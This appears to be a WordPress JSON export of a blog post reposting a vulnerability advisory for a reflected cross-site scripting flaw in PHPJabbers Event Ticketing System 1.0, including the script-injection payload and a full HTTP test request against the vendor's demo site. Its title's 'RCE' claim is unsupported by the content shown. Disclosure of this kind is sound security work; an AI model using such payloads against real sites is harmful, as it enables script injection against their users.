{"id":48088,"date":"2023-09-09T14:56:12","date_gmt":"2023-09-09T10:56:12","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/174559\/eventts10-xss.txt"},"modified":"2023-09-17T13:37:21","modified_gmt":"2023-09-17T09:07:21","slug":"event-ticketing-system-1-0-cross-site-scripting","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/event-ticketing-system-1-0-cross-site-scripting\/","title":{"rendered":"Event Ticketing System 1.0 Cross Site Scripting"},"content":{"rendered":"<p>## Title: Event Ticketing System-1.0 XSS-Reflected &#8211; RCE<br \/>\n## Author: nu11secur1ty<br \/>\n## Date: 09\/08\/2023<br \/>\n## Vendor: https:\/\/www.phpjabbers.com\/<br \/>\n## Software: https:\/\/www.phpjabbers.com\/event-ticketing-system\/#sectionDemo<br \/>\n## Reference: https:\/\/portswigger.net\/web-security\/cross-site-scripting\/reflected<\/p>\n<p>## Description:<br \/>\nThe value of the `id` request parameter is copied into the value of an<br \/>\nHTML tag attribute which is encapsulated in double quotation marks.<br \/>\nThe payload }}uypja&#8221;&gt;&lt;script&gt;alert(1)&lt;\/script&gt;k36c0 was submitted in<br \/>\nthe id parameter. This input was echoed as<br \/>\nuypja&#8221;&gt;&lt;script&gt;alert(1)&lt;\/script&gt;k36c0 in the application&#8217;s response.<br \/>\nThe attacker can use this vulnerability to trick the user into<br \/>\nexecuting &#8211; opening the browser on his machine and opening a hazardous<br \/>\nURL address.<\/p>\n<p>STATUS: HIGH Vulnerability<\/p>\n[+]Testing Payload:<br \/>\n&#8220;`GET<br \/>\nGET \/1694154671_204\/index.php?controller=pjFront&amp;action=pjActionCheckout&amp;locale=1&amp;id=1hau48%22%3e%3cscript%3ealert(1)%3c%2fscript%3exoplm<br \/>\nHTTP\/1.1<br \/>\nHost: demo.phpjabbers.com<br \/>\nAccept-Encoding: gzip, deflate<br \/>\nAccept: *\/*<br \/>\nAccept-Language: en-US;q=0.9,en;q=0.8<br \/>\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64)<br \/>\nAppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/116.0.5845.141<br \/>\nSafari\/537.36<br \/>\nConnection: close<br \/>\nCache-Control: max-age=0<br \/>\nCookie: EventTicketing=lirq5h64gv5dj0utbp2r5nsqf7<br \/>\nOrigin: http:\/\/demo.phpjabbers.com<br \/>\nReferer: http:\/\/demo.phpjabbers.com\/<br \/>\nSec-CH-UA: &#8220;.Not\/A)Brand&#8221;;v=&#8221;99&#8243;, &#8220;Google Chrome&#8221;;v=&#8221;116&#8243;, &#8220;Chromium&#8221;;v=&#8221;116&#8243;<br \/>\nSec-CH-UA-Platform: Windows<br \/>\nSec-CH-UA-Mobile: ?0<\/p>\n<p>&#8220;`<\/p>\n<p>## Reproduce:<br \/>\n[href](https:\/\/github.com\/nu11secur1ty\/CVE-nu11secur1ty\/tree\/main\/vendors\/phpjabbers\/2023\/Event-Ticketing-System-1.0)<\/p>\n<p>## Proof and Exploit:<br \/>\n[href](https:\/\/www.nu11secur1ty.com\/2023\/09\/event-ticketing-system-10-xss-reflected.html)<\/p>\n<p>## Time spent:<br \/>\n01:25:00<\/p>\n","protected":false},"excerpt":{"rendered":"<p>## Title: Event Ticketing System-1.0 XSS-Reflected &#8211; RCE ## Author: nu11secur1ty ## Date: 09\/08\/2023 ## Vendor: https:\/\/www.phpjabbers.com\/ ## Software: https:\/\/www.phpjabbers.com\/event-ticketing-system\/#sectionDemo ## Reference: https:\/\/portswigger.net\/web-security\/cross-site-scripting\/reflected ## Description: The value of the `id` request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload }}uypja&#8221;&gt;&lt;script&gt;alert(1)&lt;\/script&gt;k36c0 was submitted in &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-48088","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/48088","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=48088"}],"version-history":[{"count":1,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/48088\/revisions"}],"predecessor-version":[{"id":48327,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/48088\/revisions\/48327"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=48088"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=48088"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=48088"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}